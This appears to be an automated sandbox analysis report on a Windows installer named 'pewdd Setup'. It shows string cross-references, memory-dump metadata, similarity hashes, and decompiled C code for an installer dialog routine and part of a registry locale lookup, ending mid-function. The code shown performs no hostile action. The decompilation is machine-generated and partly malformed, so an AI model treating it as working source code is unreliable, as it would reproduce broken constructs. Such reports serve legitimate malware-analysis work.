k, xrefs: 10005A74
n, xrefs: 10007C4E
#, xrefs: 10003616
#, xrefs: 10004C19
*, xrefs: 10009A70
a, xrefs: 10005883
2, xrefs: 10007CB7
6, xrefs: 10004209
E, xrefs: 1000B49B
T, xrefs: 10003815
+, xrefs: 10004781
U, xrefs: 10009537
b, xrefs: 100064ED
C, xrefs: 10007142
!, xrefs: 10003AB5
^, xrefs: 10007CCC
#, xrefs: 1000AB8E
^, xrefs: 1000591D
K, xrefs: 10009FE8
?, xrefs: 10006F58
f, xrefs: 100075B0
s, xrefs: 10005A2E
O, xrefs: 10008DAB
%, xrefs: 10005470
m, xrefs: 1000AA6F
Y, xrefs: 10006985
(, xrefs: 1000B726
I, xrefs: 10006F89
, xrefs: 10008CC4
O, xrefs: 1000A3F4
X, xrefs: 1000393B
q, xrefs: 1000B1A0
=, xrefs: 10004FE6
%, xrefs: 10003EEB
U, xrefs: 10009266
,, xrefs: 1000B6C4
&, xrefs: 1000BA13
#, xrefs: 10003D5C
p, xrefs: 1000AB41
=, xrefs: 10003D4E
p, xrefs: 10009FE1
k, xrefs: 100060E1
9, xrefs: 10009155
?, xrefs: 1000A35A
}, xrefs: 10008AEF
=, xrefs: 100063A4
=, xrefs: 100039A4
Y, xrefs: 100086B9
}, xrefs: 100055CE
h, xrefs: 100095A0
}, xrefs: 100065BF
~, xrefs: 10008B97
L, xrefs: 10003583
h, xrefs: 1000778C
E, xrefs: 10007731
j, xrefs: 10007C0F
", xrefs: 1000A79E
<, xrefs: 1000A19A
<, xrefs: 1000A48E
>, xrefs: 100074F3
3, xrefs: 10004B7F
8, xrefs: 1000BB71
?, xrefs: 10006A5E
:, xrefs: 1000BE75
6, xrefs: 100049DB
p, xrefs: 10007D58
i, xrefs: 10005CB2
F, xrefs: 10006FE4
R, xrefs: 1000B5E4
], xrefs: 100041AE
Y, xrefs: 10007540
6, xrefs: 1000954C
W, xrefs: 1000667C
?, xrefs: 10008E5A
+, xrefs: 10006001
>, xrefs: 1000A409
e, xrefs: 10004566
&, xrefs: 10009139
e, xrefs: 100097A6
Q, xrefs: 1000B73B
., xrefs: 100075FD
B, xrefs: 1000694D
&, xrefs: 100086C7
[, xrefs: 100040CE
4, xrefs: 1000794C
I, xrefs: 100060FD
V, xrefs: 1000638F
?, xrefs: 1000ADD3
e, xrefs: 10008593
X, xrefs: 1000AC59
7, xrefs: 1000B623
_, xrefs: 10006691
#, xrefs: 10004176
$, xrefs: 1000B600
a, xrefs: 10004892
t, xrefs: 10003838
o, xrefs: 1000BADE
<, xrefs: 100038AF
M, xrefs: 10009F6A
2, xrefs: 1000AFD2
M, xrefs: 1000BF11
2, xrefs: 10006548
8, xrefs: 1000A012
>, xrefs: 100090A6
s, xrefs: 10004DA1
s, xrefs: 1000BBD3
(, xrefs: 1000BBE8
r, xrefs: 10008E8B
+, xrefs: 10005511
[, xrefs: 1000BEC5
7, xrefs: 1000715E
&, xrefs: 10004328
e, xrefs: 100074A6
-, xrefs: 10003950
E, xrefs: 1000A88C
t, xrefs: 10003F31
', xrefs: 10009CBC
C, xrefs: 100059BE
u, xrefs: 10003F9A
L, xrefs: 10004829
^, xrefs: 100038D2
', xrefs: 10007E1C
,, xrefs: 1000A170
2, xrefs: 1000B589
5, xrefs: 1000A98F
z, xrefs: 10007DD6
[, xrefs: 1000A3BC
o, xrefs: 1000A743
I, xrefs: 1000988D
e, xrefs: 10009E9F
`, xrefs: 10006D52
O, xrefs: 10007A79
C, xrefs: 1000744B
0, xrefs: 10009A9A
c, xrefs: 10009044
:, xrefs: 1000B615
D, xrefs: 10006660
e, xrefs: 1000941F
L, xrefs: 100038A1
|, xrefs: 10008CB6
f, xrefs: 1000A234
%, xrefs: 1000844A
T, xrefs: 100067CC
2, xrefs: 100046D2
+, xrefs: 1000807D
+, xrefs: 10004A75
g, xrefs: 10009098
h, xrefs: 10003EC8
;, xrefs: 100093AF
o, xrefs: 10003B80
2, xrefs: 1000AB48
-, xrefs: 10004A59
1, xrefs: 1000516E
}, xrefs: 1000A10E
O, xrefs: 10007EA1
6, xrefs: 10008D49
E, xrefs: 100047C0
^, xrefs: 100048A0
o, xrefs: 1000BA8A
], xrefs: 1000365C
', xrefs: 10007CF6
a, xrefs: 1000B2A3
a, xrefs: 10005606
[, xrefs: 100069C4
s, xrefs: 10005CC7
), xrefs: 100067F6
k, xrefs: 10008DEA
G, xrefs: 1000583D
], xrefs: 10005614
W, xrefs: 100082F3
b, xrefs: 1000957D
O, xrefs: 100036A9
[, xrefs: 1000359F
I, xrefs: 10009450
8, xrefs: 10006C1E
1, xrefs: 10003F62
H, xrefs: 1000528D
;, xrefs: 1000B1CA
Q, xrefs: 10006C79
u, xrefs: 1000AB56
e, xrefs: 100039DC
?, xrefs: 1000A058
P, xrefs: 100094D5
s, xrefs: 1000B4DA
I, xrefs: 1000BC51
f, xrefs: 10007D27
5, xrefs: 10005B1C
?, xrefs: 100061C8
H, xrefs: 10005128
=, xrefs: 10005175
%, xrefs: 1000B248
r, xrefs: 1000878B
^, xrefs: 10008ACC
Y, xrefs: 1000560D
m, xrefs: 1000B5F9
^, xrefs: 10004A36
I, xrefs: 10009C0D
:, xrefs: 10008C15
X, xrefs: 1000B1D1
:, xrefs: 1000483E
[, xrefs: 10006127
Z, xrefs: 1000BAF3
C, xrefs: 10008BF9
6, xrefs: 1000B8D1
P, xrefs: 1000AAE6
t, xrefs: 100078FF
3, xrefs: 1000A1E0
K, xrefs: 100057F0
f, xrefs: 1000AE7B
n, xrefs: 100060DA
!, xrefs: 10003A7D
R, xrefs: 1000AAAE
u, xrefs: 100062B6
Q, xrefs: 10003965
4, xrefs: 10007C24
r, xrefs: 10007460
a, xrefs: 100037D6
~, xrefs: 100068F9
7, xrefs: 1000AFAF
A, xrefs: 10007B52
b, xrefs: 100065A3
D, xrefs: 1000717A
z, xrefs: 10006FD6
@, xrefs: 10008B9E
_, xrefs: 1000BD99
v, xrefs: 100096F7
=, xrefs: 10007D9E
C, xrefs: 10006B6F
3, xrefs: 10005780
;, xrefs: 10004AAD
,, xrefs: 10008570
O, xrefs: 10004E7A
>, xrefs: 100036E1
m, xrefs: 1000B86F
G, xrefs: 1000755C
., xrefs: 100098FD
0, xrefs: 1000764A
P, xrefs: 10003D08
_, xrefs: 1000B5C1
4, xrefs: 1000693F
C, xrefs: 1000AA7D
), xrefs: 1000495D

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
API String ID: 4275171209-1562549867
Opcode ID: ed7aadfc745ad77530b252efc6c5d5ee09691a9951460c8ada8f397f2a315cdf
Instruction ID: 086467a517098afc963b3fce9be205df0339728a6615016d0f3f9194adc49a5d
Opcode Fuzzy Hash: ed7aadfc745ad77530b252efc6c5d5ee09691a9951460c8ada8f397f2a315cdf
Instruction Fuzzy Hash: E0144A1090DBEAC8DB32823C5C587CDAE611B23225F4843D9D1FC2A6D6C7B50B96DF66

Uniqueness

Uniqueness Score: -1.00%

Function 0040380A, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429fbc = _t35;
					if(_t115 == 0x110) {
						 *0x42eb68 = _t125;
						 *0x429fd0 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428f98 = _t91;
						E00403CDD(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
						 *0x42e32c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429fbc = 1;
					}
					_t122 =  *0x40919c; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42eb80;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403D29(0x40b);
						while(1) {
							_t37 =  *0x429fbc;
							 *0x40919c =  *0x40919c + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x40919c; // 0xffffffff
							__eflags = _t39 -  *0x42eb84; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e32c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42eb84; // 0x2
							__eflags =  *0x40919c - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403CDD(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ebec - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403CFF(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428f98, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ebec - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x429fd0);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428f98);
							}
							E00403D12();
							E0040592B(0x429fd8, "pewdd Setup");
							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429fd8);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e338);
									 *0x4297a8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e338 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403CDD(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e32c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e338, 8);
									E00403D29(0x405);
									goto L58;
								}
								__eflags =  *0x42ebec - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ebe0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e338);
						 *0x42eb68 = _t133;
						EndDialog(_t125,  *0x4293a0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e338, 0x40f, 0, 1);
						__eflags =  *0x42e32c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403D44(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e338, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ebec - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293a0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403CB6();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293a0 = _t127;
										goto L21;
									}
									__eflags =  *0x40919c - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e338);
						 *0x42e338 = _a12;
						L58:
						if( *0x42afd8 == _t133) {
							_t142 =  *0x42e338 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42afd8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403813
0x0040381c
0x0040395d
0x00403961
0x00403965
0x00403967
0x0040396c
0x00403977
0x00403982
0x00403987
0x00403989
0x0040398b
0x0040398e
0x00403993
0x004039a1
0x004039ae
0x004039b5
0x004039b5
0x004039b6
0x004039b6
0x004039bb
0x004039c1
0x004039c8
0x004039ce
0x004039d0
0x00403a10
0x00403a15
0x00403a1a
0x00403a1a
0x00403a1f
0x00403a28
0x00403a2a
0x00403a2f
0x00403a35
0x00403a39
0x00403a39
0x00403a3e
0x00403a44
0x00000000
0x00000000
0x00403a4a
0x00403a4f
0x00403a55
0x00000000
0x00000000
0x00403a5e
0x00403a66
0x00403a6b
0x00403a6e
0x00403a74
0x00403a79
0x00403a7c
0x00403a82
0x00403a87
0x00403a8a
0x00403a90
0x00403a98
0x00403a9e
0x00403aa4
0x00403aa8
0x00403aaf
0x00403aaf
0x00403aaf
0x00403ab9
0x00403acb
0x00403ad7
0x00403adc
0x00403ae6
0x00403aec
0x00403aee
0x00403af3
0x00403af0
0x00403af0
0x00403af0
0x00403b03
0x00403b1b
0x00403b1d
0x00403b23
0x00403b38
0x00403b25
0x00403b2e
0x00403b30
0x00403b30
0x00403b3e
0x00403b4e
0x00403b5f
0x00403b66
0x00403b6c
0x00403b70
0x00403b75
0x00403b77
0x00000000
0x00403b7d
0x00403b7d
0x00403b7f
0x00000000
0x00000000
0x00403b85
0x00403b89
0x00403bae
0x00403bb4
0x00403bba
0x00403bbc
0x00000000
0x00000000
0x00403be2
0x00403be8
0x00403bea
0x00403bef
0x00000000
0x00000000
0x00403bf5
0x00403bf8
0x00403bfb
0x00403c12
0x00403c1e
0x00403c37
0x00403c3d
0x00403c41
0x00403c46
0x00403c4c
0x00000000
0x00000000
0x00403c56
0x00403c61
0x00000000
0x00403c61
0x00403b8b
0x00403b91
0x00000000
0x00000000
0x00403b97
0x00403b9d
0x00000000
0x00000000
0x00000000
0x00403ba3
0x00403b77
0x00403c6e
0x00403c7a
0x00403c81
0x00000000
0x004039d2
0x004039d2
0x004039d5
0x00403a08
0x00403a08
0x00403a0a
0x00000000
0x00000000
0x00000000
0x00403a0a
0x004039d7
0x004039db
0x004039e0
0x004039e2
0x00000000
0x00000000
0x004039f2
0x004039fa
0x00000000
0x00403a00
0x0040382e
0x0040382e
0x00403832
0x00403837
0x00403846
0x00403846
0x0040384f
0x00403858
0x00403863
0x00403863
0x0040386f
0x0040388b
0x0040388e
0x004038a1
0x004038a7
0x0040394a
0x00000000
0x00403953
0x004038ad
0x004038ba
0x004038bc
0x004038be
0x004038dd
0x004038dd
0x004038e0
0x004038e5
0x004038e8
0x004038f8
0x004038f9
0x004038fb
0x00403931
0x00403944
0x00000000
0x00403944
0x004038fd
0x00403903
0x0040391c
0x00403921
0x00403923
0x00000000
0x00000000
0x00403925
0x00403911
0x00403911
0x00403913
0x00403913
0x00000000
0x00403913
0x00403906
0x0040390b
0x00000000
0x0040390b
0x004038ea
0x004038f0
0x00000000
0x00000000
0x004038f2
0x00000000
0x004038f2
0x004038e2
0x00000000
0x004038e2
0x004038c8
0x004038cf
0x004038d5
0x004038d7
0x00000000
0x00000000
0x00000000
0x004038d7
0x00403893
0x00000000
0x00403871
0x00403877
0x00403881
0x00403c87
0x00403c8d
0x00403c8f
0x00403c95
0x00403c9a
0x00403ca0
0x00403ca0
0x00403c95
0x00403caa
0x00000000
0x00403caa
0x0040386f

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
ShowWindow.USER32(?), ref: 00403863
DestroyWindow.USER32 ref: 00403877
SetWindowLongA.USER32 ref: 00403893
GetDlgItem.USER32 ref: 004038B4
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
IsWindowEnabled.USER32(00000000), ref: 004038CF
GetDlgItem.USER32 ref: 0040397D
GetDlgItem.USER32 ref: 00403987
KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
GetDlgItem.USER32 ref: 00403A98
ShowWindow.USER32(00000000,?), ref: 00403AB9
EnableWindow.USER32(?,?), ref: 00403ACB
EnableWindow.USER32(?,?), ref: 00403AE6
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
EnableMenuItem.USER32 ref: 00403B03
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
lstrlenA.KERNEL32(00429FD8,?,00429FD8,pewdd Setup), ref: 00403B57
SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
ShowWindow.USER32(?,0000000A), ref: 00403C9A

Strings

pewdd Setup, xrefs: 00403B48

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
String ID: pewdd Setup
API String ID: 4050669955-950259615
Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E

Uniqueness

Uniqueness Score: -1.00%

Function 00403489, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403489() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x42eb70; // 0x571350
				_t20 = E00405C49(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x429fd8;
					"1033" = 0x7830;
					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
					__eflags =  *0x429fd8;
					if(__eflags == 0) {
						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
					}
					lstrcatA("1033", _t78);
